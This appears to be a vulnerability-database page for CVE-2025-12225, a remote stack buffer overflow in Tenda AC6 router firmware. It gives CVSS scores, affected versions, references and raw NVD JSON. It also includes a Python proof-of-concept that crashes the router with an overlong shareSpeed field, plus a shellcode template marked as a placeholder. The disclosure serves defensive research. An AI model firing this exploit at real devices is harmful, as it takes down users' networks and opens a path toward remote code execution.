Security Vulnerability Report
CVE-2025-12225 CVSS 8.8 HIGH

CVE-2025-12225

Published: 2025-10-27 05:15:38
Last Modified: 2025-10-28 02:21:09

Description

A vulnerability has been found in Tenda AC6 15.03.06.50. This issue affects some unknown processing of the file /goform/WifiGuestSet of the component HTTP Request Handler. Such manipulation of the argument shareSpeed leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:tenda:ac6_firmware:15.03.06.50:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:tenda:ac6:2.0:*:*:*:*:*:*:* - NOT VULNERABLE
Tenda AC6 < 15.03.06.51

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# CVE-2025-12225 PoC - Tenda AC6 WifiGuestSet Stack Buffer Overflow
# Target: Tenda AC6 Firmware 15.03.06.50
# Component: /goform/WifiGuestSet
# Attack Vector: shareSpeed parameter overflow
import requests
import sys

TARGET_IP = "192.168.0.1"  # Default router IP
TARGET_PORT = 80


# Stack overflow payload generation
# The exact offset may vary, this is a template
# (template only: this function is never called below)
def generate_payload(offset=1000):
    # NOP sled for shellcode alignment
    nop_sled = b"\x90" * 200
    # Shellcode - binds shell to port 4444 (example)
    # This is a placeholder, actual shellcode depends on target architecture (MIPS little-endian)
    shellcode = b"\x00" * 100  # Placeholder for MIPS shellcode
    # Overflow with return address pointing to NOP sled
    padding = b"A" * (offset - len(nop_sled) - len(shellcode))
    return_address = b"\x42\x84\x04\x08"  # Example return address


def exploit(target_ip, share_speed_value="A" * 1500):
    """Send malicious request to trigger buffer overflow"""
    # Build the URL from the target passed in, not from the default TARGET_IP
    url = f"http://{target_ip}:{TARGET_PORT}/goform/WifiGuestSet"
    print(f"[*] Targeting: {target_ip}")
    print(f"[*] Sending payload with shareSpeed length: {len(share_speed_value)}")
    # Construct HTTP POST request
    data = {
        "shareSpeed": share_speed_value,
        "isEnable": "1",
        "guestSSID": "GuestNetwork"
    }
    try:
        response = requests.post(url, data=data, timeout=5)
        print(f"[!] Response status: {response.status_code}")
        return response
    except requests.exceptions.Timeout:
        print("[!] Request timed out - target may be vulnerable and crashed")
        return None
    except Exception as e:
        print(f"[!] Error: {e}")
        return None


if __name__ == "__main__":
    if len(sys.argv) > 1:
        target = sys.argv[1]
    else:
        target = TARGET_IP
    # Generate overflow payload
    payload = "A" * 1500
    exploit(target, payload)

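References

https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda/WifiGuestSet/WifiGuestSet.md (Exploit, Third Party Advisory)
https://vuldb.com/?ctiid.329895 (Permissions Required, VDB Entry)
https://vuldb.com/?id.329895 (Third Party Advisory, VDB Entry)
https://vuldb.com/?submit.673547 (Third Party Advisory, VDB Entry)
https://www.tenda.com.cn/ (Product)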

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12225", "sourceIdentifier": "[email protected]", "published": "2025-10-27T05:15:38.403", "lastModified": "2025-10-28T02:21:08.503", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in Tenda AC6 15.03.06.50. This issue affects some unknown processing of the file /goform/WifiGuestSet of the component HTTP Request Handler. Such manipulation of the argument shareSpeed leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": 
"NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-121"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tenda:ac6_firmware:15.03.06.50:*:*:*:*:*:*:*", "matchCriteriaId": "ED890D2E-3860-4E6E-A1D4-FC0031430884"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tenda:ac6:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "E382AD7E-1450-40FC-AE9D-698B491805F0"}]}]}], "references": [{"url": "https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda/WifiGuestSet/WifiGuestSet.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.329895", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.329895", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.673547", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.tenda.com.cn/", "source": "[email protected]", "tags": ["Product"]}]}}